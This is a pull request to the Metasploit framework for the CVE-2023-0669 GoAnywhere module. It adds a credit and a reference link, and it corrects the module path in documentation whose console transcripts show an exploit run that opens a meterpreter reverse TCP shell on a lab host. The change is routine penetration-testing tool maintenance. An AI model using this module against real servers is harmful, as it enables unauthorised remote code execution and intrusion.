### PR TITLE
Add credit for CVE-2023-0669; fix path in docs

### DIFF
--- a/documentation/modules/exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669.md
+++ b/documentation/modules/exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669.md
@@ -43,13 +43,13 @@ changed.
 msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
 [*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
 LHOST => 10.0.0.179
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
 RHOSTS => 10.0.0.219
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > exploit
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit
 
 [*] Started reverse TCP handler on 10.0.0.179:4444 
 [*] Sending stage (24380 bytes) to 10.0.0.219
@@ -65,16 +65,16 @@ Server username: ron
 msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
 [*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
 LHOST => 10.0.0.179
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
 RHOSTS => 10.0.0.219
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set TARGET 1
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set TARGET 1
 TARGET => 1
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > show options
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > show options
 
 [...]
 
@@ -89,7 +89,7 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > exploit
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit
 
 [*] Started reverse TCP handler on 10.0.0.179:4444 
 [*] Sending stage (24380 bytes) to 10.0.0.219
@@ -104,20 +104,20 @@ meterpreter >
 msf6 > use exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669
 [*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set LHOST 10.0.0.179
 LHOST => 10.0.0.179
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RHOSTS 10.0.0.219
 RHOSTS => 10.0.0.219
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set RPORT 8000
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set RPORT 8000
 RPORT => 8000
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > set SSL false
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > set SSL false
 [!] Changing the SSL option's value may require changing RPORT!
 SSL => false
 
-msf6 exploit(linux/http/fortra_goanywhere_rce_cve_2023_0669) > exploit
+msf6 exploit(multi/http/fortra_goanywhere_rce_cve_2023_0669) > exploit
 
 [*] Started reverse TCP handler on 10.0.0.179:4444 
 [*] Sending stage (24380 bytes) to 10.0.0.219

--- a/modules/exploits/multi/http/fortra_goanywhere_rce_cve_2023_0669.rb
+++ b/modules/exploits/multi/http/fortra_goanywhere_rce_cve_2023_0669.rb
@@ -21,10 +21,12 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'Ron Bowes', # Analysis and module
+          'Fryco' # Discovery and analysis
         ],
         'References' => [
           ['CVE', '2023-0669'],
           ['URL', 'https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis'],
+          ['URL', 'https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html']
         ],
         'DisclosureDate' => '2023-02-01',
         'License' => MSF_LICENSE,


### PR DESCRIPTION
Addresses post-merge comments from #17607 

* adds credit for Fryco to the module
* fixes the old module path in the documentation to reflect the new value under exploit/multi